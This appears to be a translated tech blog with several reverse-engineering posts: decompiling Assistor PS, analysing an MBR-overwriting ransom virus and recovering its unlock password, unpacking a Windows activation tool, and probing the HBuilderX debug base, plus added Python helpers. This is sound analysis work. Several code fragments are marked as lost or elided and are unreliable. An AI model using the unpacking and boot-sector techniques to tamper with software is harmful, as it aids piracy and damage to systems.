
Assistor PS analysis

 WeChat screenshot _20190806163246.png

Assistor PS: Save Your Valuable Time

At first glance Assistor PS looks amazing. It does not need to run as a Photoshop plug-in, yet it can read the layers and perform a whole series of clever per-layer functions: annotation, slicing, distance measurement and so on. So Anne couldn't help analyzing it.

 WeChat screenshot _20190806163744.png

The interface is very nice, with only a few buttons. I first wanted to find the event handlers behind the buttons directly, but that was not easy, so I changed approach and looked for the events bound to the hotkeys instead.

Decompiling gives the following code:

 GlobalHotKey.Register(hwndSource.Handle, ModifierKeys.Alt, GlobalHotKey.Keys.D1).Pressed += OnHotKeyPressed;
 GlobalHotKey.Register(hwndSource.Handle, ModifierKeys.Alt, GlobalHotKey.Keys.D2).Pressed += OnHotKeyPressed;

Then find the callback event.

 switch (e.Key)
 {
     case GlobalHotKey.Keys.D1:
         Tool.ExecutePosition();
         break;
     case GlobalHotKey.Keys.D2:
         Tool.ExecuteSize();
         break;
     case GlobalHotKey.Keys.D3:
         Tool.ExecuteDistance();
         break;
 }

The author has wrapped these operations in a Tool class, so look at that next.

 public void ExecutePosition() {
     this.AppendLog(LogType.Information, LogSubType.Execute, AssistorLogType.LayerDescriptor_Position, string.Empty, string.Empty);
     this.…(ScriptProvider.Execute(ScriptMethodType.Position /* inferred from the script list */, this.…()));   // the two method names did not survive extraction
 }
 public void Execute…() {   // method name lost on the page; it logs and runs the GuideBox script
     this.AppendLog(LogType.Information, LogSubType.Execute, AssistorLogType.LayerDescriptor_GuideBox, string.Empty, string.Empty);
     this.…(ScriptProvider.Execute(ScriptMethodType.GuideBox, this.…()));
 }
 public void ExecuteSnips() {
     this.AppendLog(LogType.Information, LogSubType.Execute, …, string.Empty, string.Empty);   // the rest of this method is garbled on the page
 }

Then there is a ScriptProvider, whose code is fairly well written. In short, it decides what to run from the ScriptMethodType value and then executes the corresponding Photoshop JSX script.

ScriptMethodType type

 public enum ScriptMethodType { … }   // the member list is elided on the page

JSX scripts

  1. JSX.WIT.Photoshop.Application.jsx
  2. JSX.WIT.Photoshop.Common.jsx
  3. JSX.WIT.Photoshop.Document.jsx
  4. JSX.WIT.Photoshop.DrawingContext.jsx
  5. JSX.WIT.Photoshop.JSON.jsx
  6. JSX.WIT.Photoshop.Parameter.jsx
  7. JSX.WIT.Photoshop.Parser.jsx
  8. JSX.WIT.Photoshop.Polygons.jsx
  9. JSX.WIT.Photoshop.Processor.jsx
  10. JSX.WIT.Photoshop.Script.Capture.jsx
  11. JSX.WIT.Photoshop.Script.Distance.jsx
  12. JSX.WIT.Photoshop.Script.Export.jsx
  13. JSX.WIT.Photoshop.Script.GuideBox.jsx
  14. JSX.WIT.Photoshop.Script.Guides.jsx
  15. JSX.WIT.Photoshop.Script.GuidesClear.jsx
  16. JSX.WIT.Photoshop.Script.GuidesHCenter.jsx
  17. JSX.WIT.Photoshop.Script.GuidesVCenter.jsx
  18. JSX.WIT.Photoshop.Script.jsx
  19. JSX.WIT.Photoshop.Script.Position.jsx
  20. JSX.WIT.Photoshop.Script.Rounder.jsx
  21. JSX.WIT.Photoshop.Script.Size.jsx
  22. JSX.WIT.Photoshop.Script.Snips.jsx
  23. JSX.WIT.Photoshop.Script.Text.jsx
  24. JSX.WIT.Photoshop.Script.Tiler.jsx

The script names match the members of the ScriptMethodType enum.
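To make the dispatch chain concrete (hotkey, then Tool.ExecuteXxx, then a ScriptMethodType value, then an embedded JSX resource), here is an added Python example; it is not code from the post or from Assistor PS. The 24 resource names are the ones listed above. The rule that only `Script.<Name>.jsx` files are runnable method types, while the other files are shared helpers and the bare `Script.jsx` is the base script, is my assumption, as are the function names.

```python
"""Resolve Assistor PS ScriptMethodType members to the embedded JSX resources they execute."""

# The 24 resource names from the decompiled assembly, as listed in the post.
JSX_RESOURCES = [
    "JSX.WIT.Photoshop.Application.jsx", "JSX.WIT.Photoshop.Common.jsx",
    "JSX.WIT.Photoshop.Document.jsx", "JSX.WIT.Photoshop.DrawingContext.jsx",
    "JSX.WIT.Photoshop.JSON.jsx", "JSX.WIT.Photoshop.Parameter.jsx",
    "JSX.WIT.Photoshop.Parser.jsx", "JSX.WIT.Photoshop.Polygons.jsx",
    "JSX.WIT.Photoshop.Processor.jsx", "JSX.WIT.Photoshop.Script.Capture.jsx",
    "JSX.WIT.Photoshop.Script.Distance.jsx", "JSX.WIT.Photoshop.Script.Export.jsx",
    "JSX.WIT.Photoshop.Script.GuideBox.jsx", "JSX.WIT.Photoshop.Script.Guides.jsx",
    "JSX.WIT.Photoshop.Script.GuidesClear.jsx", "JSX.WIT.Photoshop.Script.GuidesHCenter.jsx",
    "JSX.WIT.Photoshop.Script.GuidesVCenter.jsx", "JSX.WIT.Photoshop.Script.jsx",
    "JSX.WIT.Photoshop.Script.Position.jsx", "JSX.WIT.Photoshop.Script.Rounder.jsx",
    "JSX.WIT.Photoshop.Script.Size.jsx", "JSX.WIT.Photoshop.Script.Snips.jsx",
    "JSX.WIT.Photoshop.Script.Text.jsx", "JSX.WIT.Photoshop.Script.Tiler.jsx",
]
SCRIPT_PREFIX = "JSX.WIT.Photoshop.Script."
SUFFIX = ".jsx"


def method_types(resources=JSX_RESOURCES) -> list:
    """Derive the enum member names from the resource list. Assumption: only
    'Script.<Name>.jsx' files are runnable method types; Common, Parser, JSON and the
    rest are helpers shared by the scripts, and the bare Script.jsx is the base script."""
    members = []
    for name in resources:
        if name.startswith(SCRIPT_PREFIX) and name.endswith(SUFFIX):
            member = name[len(SCRIPT_PREFIX):-len(SUFFIX)]
            if member:                      # skips the bare Script.jsx
                members.append(member)
    return members


def resource_for(method_type: str, resources=JSX_RESOURCES) -> str:
    """Apply the naming rule in the direction ScriptProvider.Execute needs:
    ScriptMethodType.GuideBox -> JSX.WIT.Photoshop.Script.GuideBox.jsx."""
    name = f"{SCRIPT_PREFIX}{method_type}{SUFFIX}"
    if name not in resources:
        raise KeyError(f"no JSX script embedded for ScriptMethodType.{method_type}")
    return name


def missing_scripts(used_types, resources=JSX_RESOURCES) -> list:
    """Cross-check: every method type the Tool class dispatches must have a script to run."""
    return [t for t in used_types if f"{SCRIPT_PREFIX}{t}{SUFFIX}" not in resources]


if __name__ == "__main__":
    print("method types:", method_types())
    # the Position, Size, Distance, GuideBox and Snips operations seen in the decompile
    print("unbacked:", missing_scripts(["Position", "Size", "Distance", "GuideBox", "Snips"]))
```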

Part of the script source:

 function Photoshop() {
     var desc = new ActionDescriptor();
     var ref = new ActionReference();
     ref.putProperty(typeID("Prpr"), typeID("PbkO"));
     ref.putEnumerated(typeID("capp"), typeID("Ordn"), typeID("Trgt"));
     desc.putReference(typeID("null"), ref);
     var pdesc = new ActionDescriptor();
     // set the application's playback options ("PbkO") to accelerated performance
     pdesc.putEnumerated(typeID("performance"), typeID("performance"), typeID("accelerated"));
     desc.putObject(typeID("T   "), typeID("PbkO"), pdesc);
     executeAction(typeID("setd"), desc, DialogModes.NO);
 }

 Photoshop.prototype.SetPanelVisibility = function (panelName, visible) {
     try {
         var desc = new ActionDescriptor();
         var ref = new ActionReference();
         ref.putName(stringIDToTypeID("classPanel"), panelName);
         desc.putReference(charIDToTypeID("null"), ref);
         executeAction(stringIDToTypeID(visible ? "show" : "hide"), desc, DialogModes.NO);
     } catch (e) {
         // a panel that cannot be shown or hidden is ignored
     }
 };

 Photoshop.prototype.GetActiveDocument = function () {
     return new Document(…);   // constructor arguments lost in extraction
 };

 Photoshop.prototype.…ity = function (visible) {   // method name truncated on the page
     this.SetPanelVisibility('panelid.static.layers', visible);
 };

 Photoshop.prototype.… = function (documentId) {   // method name lost on the page; selects the document with this id
     var documentDescriptor = new ActionDescriptor();
     var documentReference = new ActionReference();
     documentReference.putIdentifier(typeID("Dcmn"), documentId);
     documentDescriptor.putReference(typeID("null"), documentReference);
     executeAction(typeID("SLCT"), documentDescriptor, DialogModes.NO);
 };

Analysis of an MBR virus

The MBR is the master boot record; the system depends on it to boot, and some viruses now target it. I happened to read a post where someone described such a virus and provided a sample, so I analyzed it. If there is any mistake, please point it out.

After infection: the MBR was wiped after the first direct decryption attempt, so the ID shown is inconsistent with the analysis.

 Screen snapshot 2019-01-15 PM 10.04.59.png

The main program is protected with a VM packer. When run it shows a window with a single button; clicking it overwrites your MBR. The MBR code is shown below.

 Screen snapshot 2019-01-15 PM 9.57.39.png

The above is the hexadecimal display of the MBR, which must be converted back into bytes for analysis. I wrote a VBScript to do the conversion.

 WriteData = "..."   ' the MBR hex dump copied from the screenshot (the string itself was removed from the page)
 Set FSO = CreateObject("Scripting.FileSystemObject")
 DropPath = FSO.GetFolder(".").Path & "\1.exe"
 If FSO.FileExists(DropPath) Then FSO.DeleteFile DropPath   ' the original condition was cut off on the page; this just clears an earlier output file
 Set Stream = CreateObject("ADODB.Stream") : Stream.Type = 2 : Stream.Charset = "iso-8859-1" : Stream.Open   ' single-byte charset, so Chr(n) is written as byte n
 HexText = Replace(WriteData, " ", "")
 For i = 1 To Len(HexText) Step 2 : Stream.WriteText Chr(CLng("&H" & Mid(HexText, i, 2))) : Next   ' two hex digits -> one byte
 Stream.SaveToFile DropPath, 2   ' adSaveCreateOverWrite

Then we can analyze 1.exe by dragging it into IDA. There is very little code, only 512 bytes, which is the fixed size of the MBR. The key code is shown below; I added comments to make it easier to read.

The bytes 39H, 44H, 39H, 37H, 33H, 46H, 67H are the password; just convert them to a string.
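The two steps above (turn a debugger hex dump back into a 512-byte file, then read the sector) generalize to any boot-sector sample, so here is an added Python example that is not part of the post. It builds a constructed 512-byte sector (not the virus sample), renders it as a debugger-style dump, parses that dump back into bytes, verifies the size and the 55 AA boot signature, decodes the partition table, pulls printable strings out of the code area, and decodes an assembler-style byte list such as the password bytes quoted above. All function names and the sample contents are my own.

```python
"""Turn a debugger-style hex dump of a boot sector back into bytes and sanity-check it as an MBR."""
import re
import struct

MBR_SIZE = 512
PART_TABLE_OFFSET = 446          # four 16-byte partition entries live at 446..509
BOOT_SIGNATURE = 0xAA55          # little-endian, so the last two bytes read 55 AA


def build_sample_mbr() -> bytes:
    """Constructed 512-byte sector for the demo (NOT the sample from the post): an inert
    code stub, a fake prompt string, one active NTFS-type partition and the boot signature."""
    sector = bytearray(MBR_SIZE)
    sector[0:3] = b"\xEB\xFE\x90"                       # JMP $ ; NOP
    prompt = b"Enter the password:"                      # constructed string in the code area
    sector[0x40:0x40 + len(prompt)] = prompt
    entry = struct.pack("<B3sB3sII", 0x80, b"\x20\x21\x00", 0x07, b"\xFE\xFF\xFF", 2048, 204800)
    sector[PART_TABLE_OFFSET:PART_TABLE_OFFSET + 16] = entry
    sector[510:512] = struct.pack("<H", BOOT_SIGNATURE)
    return bytes(sector)


def render_dump(data: bytes, width: int = 16) -> str:
    """Render bytes the way a debugger memory window does: offset, hex pairs, ASCII gutter."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02X}" for b in chunk)
        gutter = "".join(chr(b) if 0x20 <= b < 0x7F else "." for b in chunk)
        lines.append(f"{off:08X}  {hexpart:<{width * 3 - 1}}  |{gutter}|")
    return "\n".join(lines)


_OFFSET = re.compile(r"^\s*[0-9A-Fa-f]{4,8}(?::[0-9A-Fa-f]{4})?\s+")   # 00000000 or 0000:0000


def hex_dump_to_bytes(text: str) -> bytes:
    """Parse a dump like the one render_dump produces: every line starts with an offset,
    an optional |ascii| gutter is discarded, and the remaining hex pairs become bytes."""
    out = bytearray()
    for line in text.splitlines():
        if not line.strip():
            continue
        line = _OFFSET.sub("", line, count=1)
        line = line.split("|", 1)[0]
        out.extend(int(pair, 16) for pair in re.findall(r"\b[0-9A-Fa-f]{2}\b", line))
    return bytes(out)


def parse_mbr(data: bytes) -> dict:
    """Check the size and boot signature, then decode the used partition-table entries."""
    if len(data) != MBR_SIZE:
        raise ValueError(f"expected {MBR_SIZE} bytes, got {len(data)}")
    (sig,) = struct.unpack_from("<H", data, 510)
    partitions = []
    for i in range(4):
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack_from(
            "<B3sB3sII", data, PART_TABLE_OFFSET + 16 * i)
        if ptype:                                           # all-zero entry = unused slot
            partitions.append({"index": i, "bootable": status == 0x80, "type": ptype,
                               "lba_start": lba, "sectors": count})
    return {"signature_ok": sig == BOOT_SIGNATURE,
            "code_bytes": data[:PART_TABLE_OFFSET],
            "partitions": partitions}


def printable_runs(data: bytes, min_len: int = 4) -> list:
    """Pull printable ASCII runs out of the code area, the quickest way to spot prompts or keys."""
    return [m.group().decode("ascii") for m in re.finditer(rb"[\x20-\x7E]{%d,}" % min_len, data)]


def hex_list_to_str(text: str) -> str:
    """Decode a byte list written assembler-style ('39H, 44H, ...') into the string it spells."""
    return "".join(chr(int(tok, 16)) for tok in re.findall(r"\b([0-9A-Fa-f]{1,2})[Hh]\b", text))


if __name__ == "__main__":
    dump = render_dump(build_sample_mbr())
    info = parse_mbr(hex_dump_to_bytes(dump))
    print(dump)
    print("signature ok:", info["signature_ok"])
    print("partitions:", info["partitions"])
    print("strings in code area:", printable_runs(info["code_bytes"]))
    print("password bytes from the post:", hex_list_to_str("39H, 44H, 39H, 37H, 33H, 46H, 67H"))
```

The size check matters more than it looks: a dump copied from a debugger window often loses its last line or picks up a stray offset, and a 511- or 528-byte file will silently confuse the disassembler's view of the partition table and signature.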

A brief look at the activation tool problem

A few days ago I activated the system with an activation tool. It reported success, but after a restart the computer could not boot properly and I ended up reinstalling. Today a colleague told me that after he activated, his machine rebooted endlessly. So I wanted to study the activation tool, and downloaded the one my colleague said caused the endless reboots, though I am not sure it is the same version.

 Screen snapshot 2018-12-21 PM 11.03.00.png

The first instruction is PUSHAD, which looks like a compression packer, so the ESP trick should be enough to unpack it; otherwise you cannot get at the resource data behind it. I got stuck in the debugger the first time, so I fell back on a tool I had used before to unpack it.

 Screen snapshot 2018-12-21 PM 10.27.17.png

First select "correct image size", because the size changes once the image is loaded into memory, so it has to be fixed. Then click to unpack. A drawback of this unpacking method is that the import and export tables may not let you complete the dump, so you have to repair them.

 Screen snapshot 2018-12-21 PM 10.26.25.png

With strong packers, repairing the import and export table pointers is usually a problem, because the packer hides, redirects or obfuscates your pointers. There are many techniques, so the tool offers three levels of pointer repair. If that fails, you can try deleting the invalid pointers directly. This time it went well: all pointers were valid.

 Screen snapshot 2018-12-21 PM 11.08.16.png

Now save the repaired dump. It starts with push EBP (EBP being a 32-bit register), inside what is called the program's own code space ("airspace"). The start of such a region marks the start of a subroutine, but this one is the main thread.

I tried to find the beginning of the subroutine behind the Activate function on the interface.

 Screen snapshot 2018-12-21 PM 11.10.47.png

But whenever I step into one of the calls I have to wait a long time, and then it says my system is not supported, because my system is XP. So there is no way to watch the process live, only statically. You could use IDA for that, but it does not matter much tonight. The process is basically the following:

Check for 360 antivirus -> install the KMS service -> slmgr -> x0

Since my colleague mentioned the restart, I also checked whether the program calls the system's restart command. Nothing found. Note that every restart operation eventually goes through the ExitWindowsEx function:

 BOOL ExitWindowsEx(
     UINT  uFlags,
     DWORD dwReason
 );

Finally, I concluded that the reason my system could not boot was that the boot sector was damaged: the software performs read and write operations on the boot area, and Win10 boots differently from Win7, using a new boot method, so the incompatibility probably caused my machine to fail. I did not find why my colleague's machine kept restarting. If I have time, maybe I will download my colleague's version for a proper analysis. I only wrote this because I had not updated the blog for a long time and forced myself to post something.

HBuilderX test base analysis

 WeChat screenshot _20181031145619.png

Create a new project. The HTML code is as follows:

 <!DOCTYPE html>
 <meta charset="UTF-8">
 <meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">

Because cloud packaging requires filling in some information, I used the simulator for debugging directly.

 WeChat screenshot _20181031144857.png

The interface looks pretty good, and clicking the button has some effect. Then I changed the code and pressed Ctrl+S. After some output scrolled by, the simulator's interface had changed. In normal development such an upload would replace the APP, causing it to close and restart, but no such thing happened. So it feels like a WebView, with ADB notifying the APP to reload.

Let's verify:

First, look at the UI node information of this base:

 WeChat screenshot _20181031145109.png

Expanding the tree to the last node, you can see that it is a WebView, and the URL it loads can be seen in the output.

 WeChat screenshot _20181031145134.png

It is under the Android directory of the memory card. Expand this directory step by step and you will find the code you wrote.

 WeChat screenshot _20181031145209.png

This is some information about the HBuilder debugging base. If a real APP has the same structure and stores its code in the same way, there will be a problem.

PHP operations and variable references

A problem came up in a group I had joined.

$c=$b++ + ++$a;

Q: what is $c? If you throw it into an IDE you quickly get 4, but how exactly is that arrived at? Let me explain.

First, $b=&$a; note that this is a PHP reference, which is equivalent to taking the variable's memory address, that is, a pointer. So operating on $b is the same as operating on $a. In $b++ + ++$a the question is operator order: $b++ first uses $b in the calculation and then increments it, while ++$a does the opposite. So it is equivalent to $c=1+3.
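To show why aliasing, not just operator precedence, decides the answer, here is an added Python model of the evaluation; it is not PHP code and not from the post. It assumes $a starts at 1 (the post's "1+3") and follows the left-to-right order the post describes ($b++ first, then ++$a), and it also runs the same expression with $b as an independent copy for comparison.

```python
"""Model PHP's $b = &$a aliasing together with pre/post-increment evaluation."""


class PhpVar:
    """One variable slot. A PHP reference ($b = &$a) is simply a second name bound to the same slot."""

    def __init__(self, value: int) -> None:
        self.value = value

    def post_inc(self) -> int:
        """$x++ : the expression yields the old value, then the slot is incremented."""
        old = self.value
        self.value += 1
        return old

    def pre_inc(self) -> int:
        """++$x : the slot is incremented first and the expression yields the new value."""
        self.value += 1
        return self.value


def evaluate(a_initial: int = 1, by_reference: bool = True) -> dict:
    """Evaluate $c = $b++ + ++$a with $b bound by reference to $a (the post's case) or as an
    independent copy, following the left-to-right order the post describes."""
    a = PhpVar(a_initial)
    b = a if by_reference else PhpVar(a_initial)      # $b = &$a   versus   $b = $a
    left = b.post_inc()                                # $b++ : yields the current value, then increments the slot
    right = a.pre_inc()                                # ++$a : increments $a's slot, then yields the new value
    return {"left": left, "right": right, "c": left + right, "a": a.value, "b": b.value}


if __name__ == "__main__":
    print("with $b = &$a :", evaluate())                      # c = 1 + 3 = 4
    print("with $b = $a  :", evaluate(by_reference=False))    # c = 1 + 2 = 3
```

With the reference, the increment done by $b++ is already visible when ++$a runs on the same slot, which is where the 3 comes from; with a plain copy the two increments are independent and the sum is only 3.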